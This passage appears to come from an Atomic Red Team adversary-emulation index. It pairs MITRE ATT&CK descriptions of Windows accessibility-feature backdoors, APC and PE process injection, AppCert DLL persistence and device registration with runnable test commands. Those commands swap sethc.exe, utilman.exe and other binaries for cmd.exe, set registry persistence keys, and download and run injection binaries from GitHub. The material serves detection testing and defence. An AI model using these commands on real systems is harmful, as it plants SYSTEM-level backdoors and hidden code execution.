For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
* Narrator: C:\Windows\System32\Narrator.exe
* Display Switcher: C:\Windows\System32\DisplaySwitch.exe
* App Switcher: C:\Windows\System32\AtBroker.exe
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Paul Speulstra, AECOM Global Security Operations Center
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
description: |
Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
supported_platforms:
- windows
input_arguments:
parent_list:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
type: string
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
attached_process:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
type: path
default: C:\windows\system32\cmd.exe
executor:
command: |
$input_table = "#{parent_list}".split(",")
$Name = "Debugger"
$Value = "#{attached_process}"
Foreach ($item in $input_table){
$item = $item.trim()
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
}
cleanup_command: |
$input_table = "#{parent_list}".split(",")
Foreach ($item in $input_table)
{
$item = $item.trim()
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
}
name: powershell
elevation_required: true
- name: Replace binary of sticky keys
auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\sethc.exe /A
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
'
name: command_prompt
elevation_required: true
- name: Create Symbolic Link From osk.exe to cmd.exe
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
description: 'Replace accessiblity executable with cmd.exe to provide elevated
command prompt from login screen without logging in.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
takeown /F %windir%\System32\osk.exe /A
icacls %windir%\System32\osk.exe /grant Administrators:F /t
del %windir%\System32\osk.exe
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
cleanup_command: |
takeown /F %windir%\System32\osk.exe /A
icacls %windir%\System32\osk.exe /grant Administrators:F /t
del %windir%\System32\osk.exe
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
icacls %windir%\system32\osk.exe /inheritance:d
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
name: command_prompt
elevation_required: true
- name: Atbroker.exe (AT) Executes Arbitrary Command via Registry Key
auto_generated_guid: 444ff124-4c83-4e28-8df6-6efd3ece6bd4
description: 'Executes code specified in the registry for a new AT (Assistive
Technologies).
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
atbroker /start malware_test
cleanup_command: 'reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test"
/f
'
name: command_prompt
elevation_required: true
- name: Auto-start application on user logon
auto_generated_guid: 7125eba8-7b30-426b-9147-781d152be6fb
description: |
Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v TerminateOnDesktopSwitch /t REG_DWORD /d 0 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /v StartEXE /t REG_SZ /d C:\WINDOWS\system32\cmd.exe /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /t REG_SZ /d malware_test /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware_test" /f
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs" /v Configuration /f
name: command_prompt
elevation_required: true
- name: Replace utilman.exe (Ease of Access Binary) with cmd.exe
auto_generated_guid: 1db380da-3422-481d-a3c8-6d5770dba580
description: 'Replace utilman.exe (Ease of Access binary) with cmd.exe. This
allows the user to launch an elevated command prompt by clicking the Ease
of Access button on the login screen.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\utilman_backup.exe (copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\utilman.exe /A
icacls C:\Windows\System32\utilman.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
cleanup_command: 'copy /Y C:\Windows\System32\utilman_backup.exe C:\Windows\System32\utilman.exe
'
name: command_prompt
elevation_required: true
- name: Replace Magnify.exe (Magnifier binary) with cmd.exe
auto_generated_guid: 5e4fa70d-c789-470e-85e1-6992b92bb321
description: 'Replace Magnify.exe (Magnifier binary) with cmd.exe. This allows
the user to launch an elevated command prompt by toggling on the Magnifier
from the Accessibility menu on the login screen.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\Magnify_backup.exe (copy C:\Windows\System32\Magnify.exe C:\Windows\System32\Magnify_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\Magnify.exe /A
icacls C:\Windows\System32\Magnify.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Magnify.exe
cleanup_command: 'copy /Y C:\Windows\System32\Magnify_backup.exe C:\Windows\System32\Magnify.exe
'
name: command_prompt
elevation_required: true
- name: Replace Narrator.exe (Narrator binary) with cmd.exe
auto_generated_guid: 2002f5ea-cd13-4c82-bf73-e46722e5dc5e
description: 'Replace Narrator.exe (Narrator binary) with cmd.exe. This allows
the user to launch an elevated command prompt by toggling on the Narrator
button from the Accessibility menu on the login screen.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\Narrator_backup.exe (copy C:\Windows\System32\Narrator.exe C:\Windows\System32\Narrator_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\Narrator.exe /A
icacls C:\Windows\System32\Narrator.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\Narrator.exe
cleanup_command: 'copy /Y C:\Windows\System32\Narrator_backup.exe C:\Windows\System32\Narrator.exe
'
name: command_prompt
elevation_required: true
- name: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe
auto_generated_guid: 825ba8ca-71cc-436b-b1dd-ea0d5e109086
description: 'Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe.
This allows the user to launch an elevated command prompt by pressing the
Windows Key + P on the login screen.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\DisplaySwitch_backup.exe (copy C:\Windows\System32\DisplaySwitch.exe C:\Windows\System32\DisplaySwitch_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\DisplaySwitch.exe /A
icacls C:\Windows\System32\DisplaySwitch.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\DisplaySwitch.exe
cleanup_command: 'copy /Y C:\Windows\System32\DisplaySwitch_backup.exe C:\Windows\System32\DisplaySwitch.exe
'
name: command_prompt
elevation_required: true
- name: Replace AtBroker.exe (App Switcher binary) with cmd.exe
auto_generated_guid: 210be7ea-d841-40ec-b3e1-ff610bb62744
description: 'Replace AtBroker.exe (App Switcher binary) with cmd.exe. This
allows the user to launch an elevated command prompt from the login screen
by locking and then unlocking the computer after toggling on any of the accessibility
tools in the Accessibility menu.
'
supported_platforms:
- windows
executor:
command: |
IF NOT EXIST C:\Windows\System32\AtBroker_backup.exe (copy C:\Windows\System32\AtBroker.exe C:\Windows\System32\AtBroker_backup.exe) ELSE ( pushd )
takeown /F C:\Windows\System32\AtBroker.exe /A
icacls C:\Windows\System32\AtBroker.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\AtBroker.exe
cleanup_command: 'copy /Y C:\Windows\System32\AtBroker_backup.exe C:\Windows\System32\AtBroker.exe
'
name: command_prompt
elevation_required: true
T1055.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605
created: '2020-01-14T01:29:43.786Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/004
external_id: T1055.004
- source_name: Microsoft APC
description: Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December
8, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx
- source_name: CyberBit Early Bird Apr 2018
description: Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’
Code Injection Technique Discovered. Retrieved May 24, 2018.
url: https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
- source_name: ENSIL AtomBombing Oct 2016
description: 'Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE
INJECTION FOR WINDOWS. Retrieved December 8, 2017.'
url: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows
- source_name: Microsoft Atom Table
description: Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:00.298Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
as possibly elevate privileges. APC injection is a method of executing arbitrary
code in the address space of a separate live process. \n\nAPC injection is
commonly performed by attaching malicious code to the APC Queue (Citation:
Microsoft APC) of a process's thread. Queued APC functions are executed when
the thread enters an alterable state.(Citation: Microsoft APC) A handle to
an existing victim process is first created with native Windows API calls
such as OpenThread. At this point QueueUserAPC can
be used to invoke a function (such as LoadLibrayA pointing to
a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\",
involves creating a suspended process in which malicious code can be written
and executed before the process' entry point (and potentially subsequent anti-malware
hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation:
ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke
malicious code previously written to the global atom table.(Citation: Microsoft
Atom Table)\n\nRunning code in the context of another process may allow access
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via APC injection may also evade detection from security products
since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1
description: |
Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Excercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
supported_platforms:
- windows
input_arguments:
exe_binary:
description: Output Binary
type: path
default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
dependency_executor_name: powershell
dependencies:
- description: "#{exe_binary} must be exist on system.\n"
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe" -OutFile "#{exe_binary}"
executor:
command: '"#{exe_binary}"
'
name: command_prompt
- name: EarlyBird APC Queue Injection in Go
auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
description: "Creates a process in a suspended state and calls QueueUserAPC
WinAPI to add a UserAPC to the child process that points to allocated shellcode.
\nResumeThread is called which then calls NtTestAlert to execute the created
UserAPC which then executes the shellcode.\nThis technique allows for the
early execution of shellcode and potentially before AV/EDR can hook functions
to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
References: \n - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
\ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process to spawn
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
-debug
'
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
- name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
User APC\" in the current thread of the current process to execute shellcode.
\nSince the shellcode is loaded and executed in the current process it is
considered local shellcode execution.\n\nSteps taken with this technique\n1.
Allocate memory for the shellcode with VirtualAlloc setting the page permissions
to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
allocated memory space\n3. Change the memory page permissions to Execute/Read
with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
shellcode in the current thread by creating a Special User APC through the
NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
References:\n - https://repnz.github.io/posts/apc/user-apc/\n - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
\ - https://0x00sec.org/t/process-injection-apc-injection/24608\n - https://twitter.com/aionescu/status/992264290924032005\n
\ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
-debug\n"
cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
T1546.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c
created: '2020-01-24T14:47:41.795Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/009
external_id: T1546.009
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Sysinternals AppCertDlls Oct 2007
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20130401232752/https://forum.sysinternals.com/appcertdlls_topic12546.html
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:00.663Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs
Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session
Manager\\ are loaded into every process that calls the ubiquitously
used application programming interface (API) functions CreateProcess,
CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW,
or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar
to [Process Injection](https://attack.mitre.org/techniques/T1055), this value
can be abused to obtain elevated privileges by causing a malicious DLL to
be loaded and run in the context of separate processes on the computer. Malicious
AppCert DLLs may also provide persistence by continuously being triggered
by API activity. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1546.009
atomic_tests:
- name: Create registry persistence via AppCert DLL
auto_generated_guid: a5ad6104-5bab-4c43-b295-b4c44c7c6b05
description: "Creates a new 'AtomicTest' value pointing to an AppCert DLL in
the AppCertDlls registry key. \nOnce the computer restarted, the DLL will
be loaded in multiple processes and write an \n'AtomicTest.txt' file in C:\\Users\\Public\\
to validate that the DLL executed succesfully.\n\nReference: https://skanthak.homepage.t-online.de/appcert.html\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: path of dll to use
type: path
default: PathToAtomicsFolder\T1546.009\bin\AtomicTest.dll
reboot:
description: Set value to $true if you want to automatically reboot the
machine
type: string
default: "$false"
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{dll_path})
'
prereq_command: 'if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.009/bin/AtomicTest.dll" -OutFile "#{dll_path}"
executor:
command: "Copy-Item \"#{dll_path}\" C:\\Users\\Public\\AtomicTest.dll -Force\nreg
add \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\AppCertDlls\"
/v \"AtomicTest\" /t REG_EXPAND_SZ /d \"C:\\Users\\Public\\AtomicTest.dll\"
/f\nif(#{reboot}){Restart-Computer} \n"
cleanup_command: |
reg delete "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls" /v "AtomicTest" /f
Remove-Item C:\Users\Public\AtomicTest.dll -Force
Remove-Item C:\Users\Public\AtomicTest.txt -Force
name: powershell
elevation_required: true
T1098.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215
created: '2022-03-04T18:30:38.989Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/005
external_id: T1098.005
- source_name: Expel Atlas Lion 2025
description: 'Ben Nahorney and Jennifer Maynard. (2025, April 10). Observing
Atlas Lion (part one): Why take control when you can enroll?. Retrieved
May 22, 2025.'
url: https://expel.com/blog/observing-atlas-lion-part-one/
- source_name: CISA MFA PrintNightmare
description: Cybersecurity and Infrastructure Security Agency. (2022, March
15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting
Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability.
Retrieved March 16, 2022.
url: https://www.cisa.gov/uscert/ncas/alerts/aa22-074a
- source_name: Mandiant APT29 Microsoft 365 2022
description: 'Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29
Continues Targeting Microsoft 365. Retrieved February 23, 2023.'
url: https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft
- source_name: AADInternals - Conditional Access Bypass
description: Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional
access by faking device compliance. Retrieved March 4, 2022.
url: https://o365blog.com/post/mdm
- source_name: AADInternals - BPRT
description: 'Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining
multiple devices to Azure AD and Intune. Retrieved March 4, 2022.'
url: https://o365blog.com/post/bprt/
- source_name: AADInternals - Device Registration
description: Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD
device join. Retrieved March 9, 2022.
url: https://o365blog.com/post/devices/
- source_name: DarkReading FireEye SolarWinds
description: 'Kelly Jackson Higgins. (2021, January 7). FireEye''s Mandia:
''Severity-Zero Alert'' Led to Discovery of SolarWinds Attack. Retrieved
April 18, 2022.'
url: https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack
- source_name: Microsoft - Device Registration
description: 'Microsoft 365 Defender Threat Intelligence Team. (2022, January
26). Evolved phishing: Device registration trick adds to phishers’ toolbox
for victims without MFA. Retrieved March 4, 2022.'
url: https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa
- source_name: Microsoft DEV-0537
description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
organizations for data exfiltration and destruction. Retrieved March 23,
2022.
url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-05-22T21:02:06.575Z'
name: Device Registration
description: |-
Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device or a virtual machine to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)(Citation: Expel Atlas Lion 2025)
Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Pawel Partyka, Microsoft 365 Defender
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Identity Provider
x_mitre_version: '1.4'
atomic_tests: []
T1055.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662
created: '2020-01-14T01:27:31.344Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/002
external_id: T1055.002
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:01.839Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
PE injection is a method of executing arbitrary code in the address space
of a separate live process. \n\nPE injection is commonly performed by copying
code (perhaps without a file on disk) into the virtual address space of the
target process before invoking it via a new thread. The write can be performed
with native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
then invoked with CreateRemoteThread or additional code (ex:
shellcode). The displacement of the injected code does introduce the additional
requirement for functionality to remap memory references. (Citation: Elastic
Process Injection July 2017) \n\nRunning code in the context of another process
may allow access to the process's memory, system/network resources, and possibly
elevated privileges. Execution via PE injection may also evade detection from
security products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1055.002
atomic_tests:
- name: Portable Executable Injection
auto_generated_guid: 578025d5-faa9-4f6d-8390-aae739d503e1
description: This test injects a portable executable into a remote Notepad process
memory using Portable Executable Injection and base-address relocation techniques.
When successful, a message box will appear with the title "Warning" and the
content "Atomic Red Team" after a few seconds.
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055.002\bin\RedInjection.exe
dependency_executor_name: powershell
dependencies:
- description: 'Portable Executable to inject must exist at specified location
(#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.002/bin/RedInjection.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
T1547.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3
created: '2021-10-05T21:26:15.081Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/015
external_id: T1547.015
- source_name: Adding Login Items
